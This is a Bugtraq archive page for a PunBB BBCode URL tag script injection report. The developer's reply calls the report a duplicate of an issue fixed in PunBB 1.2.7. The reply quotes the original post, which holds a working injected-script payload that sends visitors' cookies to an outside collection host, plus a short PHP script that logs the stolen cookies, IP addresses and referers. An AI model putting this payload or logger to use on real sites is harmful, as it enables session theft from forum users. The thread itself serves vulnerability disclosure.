Bugtraq mailing list archives
Re: PunBB BBCode URL Tag Script Injection Vulnerability
From: Rickard Andersson <security () punbb org>
Date: Tue, 17 Jan 2006 20:07:11 +0100
This is a duplicate of http://www.securityfocus.com/bid/14808/info which was dealt with in PunBB 1.2.7 (released september 2, 2005). It only affected Internet Explorer users by the way. Why re-post it?
Rickard Andersson PunBB dev night_warrior771 () hotmail com wrote:
##Night_Warrior<Kurdish Hacker> ##night_warrior771[at]hotmail.com ##PunBB BBCode URL Tag Script Injection Vulnerability ##Contact :night_warrior771[at]hotmail.com Vulnerable: [color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://nigwar.tollfreepage.com/cookies.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color] <?php cookies.php $cookie = $_GET['c']; $ip = getenv ('REMOTE_ADDR'); $date=date("j F, Y, g:i a"); $referer=getenv ('HTTP_REFERER'); $fp = fopen('steal.php', 'a'); fwrite($fp, ' Cookie: '.$cookie.' IP: ' .$ip. ' Date and Time: ' .$date. ' Referer: '.$referer.' '); fclose($fp); ?> Contact :night_warrior771[at]hotmail.com Night_Warrior
Current thread:
- PunBB BBCode URL Tag Script Injection Vulnerability night_warrior771 (Jan 17)
- Re: PunBB BBCode URL Tag Script Injection Vulnerability Rickard Andersson (Jan 18)